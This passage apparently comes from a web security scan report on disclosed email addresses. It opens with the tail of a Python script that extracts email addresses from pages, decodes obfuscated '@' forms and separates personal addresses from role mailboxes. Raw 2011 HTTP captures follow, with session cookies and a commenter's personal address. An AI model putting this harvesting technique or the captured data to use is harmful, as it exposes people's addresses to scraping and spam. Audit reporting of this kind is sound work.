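    (user&#64;host), so both obfuscations are seen as a plain '@'.
    """
    text = html.unescape(unquote(body))
    return Counter(m.group(0).lower() for m in _EMAIL.finditer(text))


def triage(body):
    """Split the addresses in body into (role mailboxes, other addresses), each sorted."""
    counts = find_emails(body)
    role = sorted(a for a in counts if a.split("@", 1)[0] in ROLE_LOCAL_PARTS)
    other = sorted(a for a in counts if a not in role)   # 'other' is where personal addresses land
    return role, other


# Constructed sample: the mailto links from 18.2 (one percent-encoded, one entity-encoded),
# the commenter line from 18.3, and two '@' tokens that must not match.
SAMPLE_BODY = """
<a href="mailto:abuse@digg.com">abuse@digg.com</a>
<a href="mailto:support%40digg.com">support&#64;digg.com</a>
<span class="user-name">George J. Kenny - georgejkenny@msn.com</span>
<style>@media screen { .x { color: #000 } }</style>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
<!-- jquery@1.4 -->
"""

if __name__ == "__main__":
    print(find_emails(SAMPLE_BODY))
    print(triage(SAMPLE_BODY))
```

On the sample this reports abuse@digg.com and support@digg.com twice each and georgejkenny@msn.com once, and the triage puts only the msn.com address in the second list. The regex deliberately rejects @media and jquery@1.4 because the domain part must end in an alphabetic label; if a target emits addresses with entity-encoded dots as well, extend the decoding step rather than loosening the pattern.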


18.1. http://about.digg.com/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://about.digg.com
Path:   /privacy

Issue detail

The following email address was disclosed in the response (visible in the response excerpt below):

support@digg.com

Request

GET /privacy HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=5dae80891524c3f10a5dd8dcaee38263; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16757


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:support@digg.com">support@digg.com</a>
...[SNIP]...

18.2. http://about.digg.com/terms-use

Summary

Severity:   Information
Confidence:   Certain
Host:   http://about.digg.com
Path:   /terms-use

Issue detail

The following email addresses were disclosed in the response (visible in the response excerpt below; support@digg.com appears twice):

abuse@digg.com
support@digg.com

Request

GET /terms-use HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=790163a5d0bb3c66f0901f4df9eaeead; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24783


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:abuse@digg.com">abuse@digg.com</a>
...[SNIP]...
<a href="mailto:support@digg.com">support@digg.com</a>
...[SNIP]...
<a href="mailto:support@digg.com">support@digg.com</a>
...[SNIP]...

18.3. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

Issue detail

The following email address was disclosed in the response (visible in the response excerpt below, in a commenter's display name):

georgejkenny@msn.com

Request

GET /b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx HTTP/1.1
Host: blogs.technet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Pingback: http://blogs.technet.com/b/microsoft_on_the_issues/pingback.aspx
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:21:29 GMT
Content-Length: 143939


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<span class="user-name">George J. Kenny - georgejkenny@msn.com</span>
...[SNIP]...

18.4. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /utility/js/omni_rsid_technet_current.js

Issue detail

The following email address was disclosed in the response:

Request

GET /utility/js/omni_rsid_technet_current.js HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=1306444613329_0b6a_7430_ae20_acaad3f30011; mstcid=173653f; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 16 Jun 2011 17:11:42 GMT
Accept-Ranges: bytes
ETag: "0db3e76482ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:18:45 GMT
Content-Length: 73916

// for sites using analytics.aspx, update omniGuidPath with the path to the analytics.aspx file, omitting the protocol
// for blogs this should be either
//        omniGuidPath : "://blogs.msdn.com/anal
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

18.5. http://bstats.adbrite.com/adserver/behavioral-data/0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /adserver/behavioral-data/0

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjY6J2rHyITNDMyNTg5NzI4OTgzNjQ4MTgzMAouCgY3NjI3MDEYva3q3iYiHkUzRjMyQkQwNUE4RERGNEQ1NjQ2RDc5NjQwMDg4QhAB; ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; vsd=0@1@4e144551@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:06 GMT
Set-Cookie: vsd=0@2@4e14819a@view.atdmt.com; path=/; domain=.adbrite.com; expires=Fri, 08-Jul-2011 15:39:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

18.6. http://cdn1.viximo.com/api_assets/ca02f696b/javascripts/api/v3/vixui.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.viximo.com
Path:   /api_assets/ca02f696b/javascripts/api/v3/vixui.js

Issue detail

The following email address was disclosed in the response:

Request

GET /api_assets/ca02f696b/javascripts/api/v3/vixui.js HTTP/1.1
Host: cdn1.viximo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: dAJVrn+MoCjAHvDzH2jVIa82k5Qex4cTMH8TNv/LwTPuO5EZgX6mKBHhqqsdiGOF
x-amz-request-id: 312E25C57AEA504C
Date: Wed, 06 Jul 2011 11:21:39 GMT
Last-Modified: Thu, 30 Jun 2011 17:57:01 GMT
ETag: "ed74b04ae9f165b1a323bf30a5028b63"
Accept-Ranges: bytes
Content-Type: text/javascript
Server: AmazonS3
Vary: Accept-Encoding
Cache-Control: private, max-age=604800
Age: 0
Expires: Wed, 13 Jul 2011 11:21:39 GMT
Content-Length: 1125197
Connection: Keep-Alive

viximo.jQueryInFrame=function(T){var H=T.window,L=T.setTimeout||H.setTimeout,M=T.setInterval||H.setInterval;(function(O,D){var g=O.document,K=function(){function q(){if(!y.isReady){try{g.documentEleme
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href=""mailto:support@viximo.com"">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href=\"mailto:support@viximo.com?subject=Help%20in%20{{app}}%20on%20{{publisher}}&body=%0A%0AName:%20{{name}}%0AUserid:%20{{userid}}%0ANetwork:%20{{publisher}}%0AApp:%20{{app}}\">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com?subject=Help%20in%20{{app}}%20on%20{{publisher}}&body=%0A%0AName:%20{{name}}%0AUserid:%20{{userid}}%0ANetwork:%20{{publisher}}%0AApp:%20{{app}}">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...

18.7. https://foton-ewm-es.ubs.com/safe-login/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://foton-ewm-es.ubs.com
Path:   /safe-login/Login

Issue detail

The following email address was disclosed in the response:

Request

GET /safe-login/Login?handler=SAFEGetLogin HTTP/1.1
Host: foton-ewm-es.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response




<html>
<head>
<title>Bienvenido a UBS Bank, S.A.</title>
<meta pageName='login-Login'>
<meta serviceTime='0'>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link
...[SNIP]...
<a href='mailto:intermediaires.france@ubs.com?subject=Forgotten%20Password&body=login%20name:'>
...[SNIP]...

18.8. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15514

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

18.9. https://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following email address was disclosed in the response:

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950910&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1 HTTP/1.1
Host: login.live.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; E=P:P/yZGuUJzog=:Kzhdi7iyZGIIP6617hxekA9uY0QbUMz6hwgjPGAdv04=:F; xid=4eaac30d-fa12-4b9e-a769-aec310f3e37a&&BL2xxxxxC664&230; xidseq=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14263
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:15:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309950978&id=73625&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-55d45d8a-4113-45e0-90d0-585f12970906; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E59 V: 0
Date: Wed, 06 Jul 2011 11:16:17 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E59 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

18.10. https://login.live.com/pp1100/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /pp1100/

Issue detail

The following email address was disclosed in the response:

Request

GET /pp1100/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12506
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-173062aa-9edd-4769-b216-ebf691c92719; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E41 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E41 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

18.11. https://login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following email address was disclosed in the response:

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12542
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-f4d8415d-863c-470b-9c48-033be61fa412; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E54 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E54 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

18.12. https://login.live.com/ppsecure/secure.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/secure.srf

Issue detail

The following email address was disclosed in the response:

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12531
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-2f030afb-c784-4e3b-9dbe-a3f70a5aa8ef; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E32 V: 0
Date: Wed, 06 Jul 2011 11:21:03 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E32 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

18.13. https://manage.softlayer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:43 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<a href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a href="mailto:support@softlayer.com">support@softlayer.com</a>
...[SNIP]...

18.14. https://manage.softlayer.com/Sales/orderComputingInstance

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /Sales/orderComputingInstance

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Sales/orderComputingInstance HTTP/1.1
Host: manage.softlayer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1306442258.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-1683070318-1308913155755; _mkto_trk=id:220-ESA-932&token:_mch-softlayer.com-1306437485169-98953; __utma=1.1168266774.1306437626.1306442258.1308913135.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:14:55 GMT
Server: Apache
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18438

